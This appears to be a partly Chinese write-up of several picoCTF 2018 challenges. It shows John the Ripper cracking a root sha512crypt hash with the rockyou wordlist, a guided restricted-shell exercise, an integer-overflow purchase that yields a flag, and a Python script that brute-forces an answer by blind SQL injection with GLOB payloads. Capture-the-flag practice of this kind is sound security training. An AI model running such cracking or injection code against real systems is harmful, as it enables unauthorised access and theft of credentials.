root@kali:~/Desktop/HEEEEEEERE'S Johnny!# john --wordlist=/usr/share/wordlists/rockyou.txt tocrack Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status thematrix (root) 1g 0:00:00:18 DONE (2018-10-08 05:24) 0.05488g/s 604.1p/s 604.1c/s 604.1C/s kenya..saavedra Use the "--show" option to display all of the cracked passwords reliably Session completed root@kali:~/Desktop/HEEEEEEERE'S Johnny!# john --show tocrack root:thematrix:0:0:root:/root:/bin/bash
~ nc 2018shell1.picoctf.com 33158 Sweet! We have gotten access into the system but we aren't root. It's some sort of restricted shell! I can't see what you are typing but I can see your output. I'll be here to help you along. If you need help, type "echo 'Help Me!'" and I'll see what I can do There is not much time left! ~/$ ls blackmail executables passwords photos secret ~/$ cd secret Now we are cookin'! Take a look around there and tell me what you find! ~/secret$ ls intel_1 intel_2 intel_3 intel_4 intel_5 profile_AipieG5Ua9aewei5ieSoh7aph profile_Xei2uu5suwangohceedaifohs profile_ahShaighaxahMooshuP1johgo profile_ahqueith5aekongieP4ahzugi profile_aik4hah9ilie9foru0Phoaph0 profile_bah9Ech9oa4xaicohphahfaiG profile_ie7sheiP7su2At2ahw6iRikoe profile_of0Nee4laith8odaeLachoonu profile_poh9eij4Choophaweiwev6eev profile_poo3ipohGohThi9Cohverai7e Sabatoge them! Get rid of all their intel files! ~/secret$ rm intel_* Nice! Once they are all gone, I think I can drop you a file of an exploit! Just type "echo 'Drop it in!' " and we can give it a whirl! ~/secret$ echo 'Drop it in!' Drop it in! I placed a file in the executables folder as it looks like the only place we can execute from! Run the script I wrote to have a little more impact on the system! ~/secret$ cd .. ~/$ cd executables ~/executables$ ls dontLookHere ~/executables$ ./dontLookHere 8c4a 2484 feba 76aa 88a7 54be 7cc7 6119 3f6a dfcc 96b4 1a2c 91bc a4b6 8cf1 6942 c3c8 8707 0612 6834 e5e4 347d 3bbf 930c 1cb3 0992 ad0a a631 5a70 dc88 9311 e6e2 596a 230b 34d9 5fd8 73ed 2fdc a9ee 5833 b7d1 49b1 1fc1 09b8 85e7 4d14 dffb 3b3b 08e2 62db 96cf 0055 5e5e a90d 0ddf 0a3d 79f6 56d2 7bf0 fb3d 2942 71c4 14a2 2bcd 74d9 c4ca 7f7e f7b6 6688 8cef 9f21 3ad9 d139 cc32 2236 a3c1 edb5 9d25 576a 46c0 9cdb 9618 a1cd 849d f589 93a5 620a 6d47 e69a 6199 a8ba be23 a532 8e3a 4245 3e34 ac51 98f5 1054 7a95 72fe 74fa e233 308a 4157 8e87 6736 15f0 eafe 709a ad3a e181 caf0 d939 4ad2 70c9 96de 07b1 9de5 6a45 0707 f9d9 8f3a 1bb5 e8f4 34f9 eb24 bf8e e80f ca71 115c 9d23 94e2 e05f 3cb6 f5d2 86e9 ea66 c5e0 1d23 45b8 d676 e1e0 b589 a3b9 d929 52ba 177c e4ca b027 3f07 7247 f5f8 0843 5d6d 46d4 2f5d 3b39 d7fc dc81 36e2 22ee 39b7 949e 94ff 1869 6dea d55e 7e36 afaa 5a96 9ceb ff5d efe5 9b0b ad9e 69f0 253b 2874 6eff 27b5 ccbf 1661 2564 f921 1290 725b 49f6 aa7b 4c63 b3e3 9e15 03ab ecd3 9405 d6e5 1bc0 bffd 1633 1382 6e7d 9726 8e35 aa9c 3632 525a 2b74 c61f 1237 eda6 06ca 3fb5 dd96 0508 228d dcd7 bc48 1429 2e85 627d 360c 8626 a8b4 3f38 df81 f320 ca26 c0d8 1f5d 40a1 1a6f 74b4 e366 3995 66f1 4617 4b8b 5a15 a1fc 8ec8 81cf 6f5e 6608 20b4 71d8 eec9 95dc 90fc 8a57 6db5 c87d 19e7 9af2 4c8f 807e c234 924f 4730 178e 3dc8 a6a7 edb9 9d61 8807 12e5 dfb8 e6fd c59d 5a93 c337 1be2 ccf3 f207 cd27 fd72 449f 5926 55f5 c301 6395 1b58 8607 4c69 a487 de55 55c2 7d74 cfb3 b6ef 6af8 1325 6557 c24b d6f1 2278 519a aadd 2653 776a da11 e31f ccd1 cc95 1b27 2dde 5b9f f843 3923 17c6 e1d2 3676 3f34 f114 d294 1efd cfaf 8fe5 1d30 4fc2 28fd 324e 21ed d674 42ba d569 47de 1162 6805 75d5 4173 af3a 463b 08f9 3a75 abdd fe25 3826 718a 275f 5c18 4c81 4b32 3aa6 c93e d9a0 0818 25e3 afed e67e 55d2 b17c a065 52de 54a4 ee0e 412a 1442 250d 9163 d6d4 5b21 ca0b 1f14 49f7 ecc5 05eb b56a 612f 26d1 3c49 b612 4ad6 4ef6 15c7 836e 10b8 5888 017d 32b9 3671 aa24 c08f 9cb9 9611 e71d 8a86 eb43 9ef8 a31c ed09 c5ba 51e0 d0b4 f36f 9ffc f806 143e f6b5 d3ce aed2 1af1 0a8e 9391 7fdb 3cf1 aee2 4af2 778c beb1 cfe8 790b d71c 44aa 6233 a8f0 90eb aeeb c0d2 6d7d a2ff 80e6 4196 e48b 8d92 5392 4fb5 a3c0 d4d6 34e4 30d2 6a79 bffd cf48 41ef dc34 51f0 8a24 70ea 6406 e9c3 60d3 d7d3 75f3 9df6 56a8 50dc fa2a 60fd d111 eb11 4f30 d70b 666b 97ab 7c01 9b4e aace 460e 10c3 8a10 23b3 2d31 16a8 569a 1830 f6f7 114f 56da a935 ba59 2786 a1d1 34a6 cbb0 d5a1 92af 3e3b 045e e499 6ca8 9e50 eb23 320e 329c 1cf3 f2e1 0ab7 00c0 396a c7a9 6d7e 86c0 3374 435c 658b fd80 5b6f d843 bde5 1238 fcdc ffc9 c3b9 c630 8cf1 cd30 d401 3226 58be d5c7 fd83 d659 8565 4590 c6c0 a4c2 bdfe 8772 835a a59e 03d0 d852 f93c effd 4704 0210 d63b db1a ae07 6eb2 3938 b944 cbb5 a899 8d4d 6e7d 8cb9 417f d202 fdf5 4ed9 557b a1b1 6d5d af57 c316 9797 571d 19cd b114 64ca 5b96 05f3 f673 9051 9933 63cc f86c 7f85 f43c 547d c5ab 8b67 58cc bd1c 3cca e234 f4d4 5ed3 0fba f069 9b3e 18bc bc25 9642 7b4a 18a3 ca80 3666 9e71 6964 fbe8 fb40 db7a 2d22 24b5 3bd2 8ff6 039e 4056 afe5 92fc d9da 3ccf 0f65 ddc1 e1d5 0565 a1e9 bcd4 d928 cf71 7d04 303b 69a9 44ed ec7c 2e06 0975 5d0a a3af ce0f ac8b 210a ebc7 b3d6 313c c00b 0688 afdb f59c 1e27 8942 06c6 b518 96ef 0228 f1e0 ad51 481b fc8c 3617 1465 3169 a097 dee6 e821 be68 bc00 73e2 f765 75bb 1d33 b936 1233 80a5 be12 6871 aa81 ff45 c758 a48b 7e15 b744 ac7c fe9b 4334 ee35 056b f28f 9d15 e0de 4e6a f75b c60a 1de2 172e b8e8 7966 33ff 9f6f 7f55 cf8c 744c 5810 5649 2b03 a17a c4f4 6a0a 17c8 c7d7 6d28 cb31 8d80 a221 930a 1adc e1d9 ba81 3d3f bba1 abc3 9692 8493 0627 5787 ad6e ce71 278c e458 2d27 8b26 2110 c7e1 23a9 cfc1 08f3 7fc4 f699 6683 7f6a 46ef 2410 f489 0d2f 39ff 66e7 9b2e d774 896f 1923 6381 43ae 7ea5 Looking through the text above, I think I have found the password. I am just having trouble with a username. Oh drats! They are onto us! We could get kicked out soon! Quick! Print the username to the screen so we can close are backdoor and log into the account directly! You have to find another way other than echo! ~/executables$ whoami l33th4x0r Perfect! One second! Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read. Try copying the file called TopSecret in tmp directory into the passwords folder. ~/executables$ cp /tmp/TopSecret ~/passwords : command not found or invalid ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ in tmp directory into the passwords folder. in: command not found or invalid ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ cp /tmp/TopSecret ~/passwords ~/executables$ cp /tmp/TopSecret ../passwords Server shutdown in 10 seconds... Quick! go read the file before we lose our connection! ~/executables$ cd .. ~/$ cd passwords ~/passwords$ ls TopSecret ~/passwords$ cat TopSecret Major General John M. Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself. picoCTF{CrUsHeD_It_9edaa84a}
Welcome to the Store App V1.0 World's Most Secure Purchasing App
[1] Check Account Balance
[2] Buy Stuff
[3] Exit
Enter a menu selection 2 Current Auctions [1] I Can't Believe its not a Flag! [2] Real Flag 1 Imitation Flags cost 1000 each, how many would you like? 10000000000000000
Your total cost is: -1981284352
Your new balance: 1981285452 Welcome to the Store App V1.0 World's Most Secure Purchasing App
[1] Check Account Balance
[2] Buy Stuff
[3] Exit
Enter a menu selection 2 Current Auctions [1] I Can't Believe its not a Flag! [2] Real Flag 2 A genuine Flag costs 100000 dollars, and we only have 1 in stock Enter 1 to purchase1 YOUR FLAG IS: picoCTF{numb3r3_4r3nt_s4f3_03054e5d}
$row = $result->fetchArray(); if($answer == $CANARY) { echo "<h1>Perfect!</h1>"; echo "<p>Your flag is: $FLAG</p>"; } elseif ($row) { echo "<h1>You are so close.</h1>"; } else { echo "<h1>Wrong.</h1>"; } ?>
存在sql注入,只有You are so close.和Wrong两种回显,能进行盲注得出answer
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
import requests import string
answer = '' for i in range(100): for e in string.printable: c = e payload = "' or answer GLOB '{}*".format(answer+c) # ' OR answer LIKE ' print payload r = requests.post('http://2018shell1.picoctf.com:15987/answer2.php', data = {'answer': payload}) if 'so close' in r.text: print r.text answer += c print answer break
# 41AndSixSixths
Help Me Reset 2
每次刷新页面中的注释<!--Proudly maintained by barboza-->都会变化,结合题目,应该是提示的用户名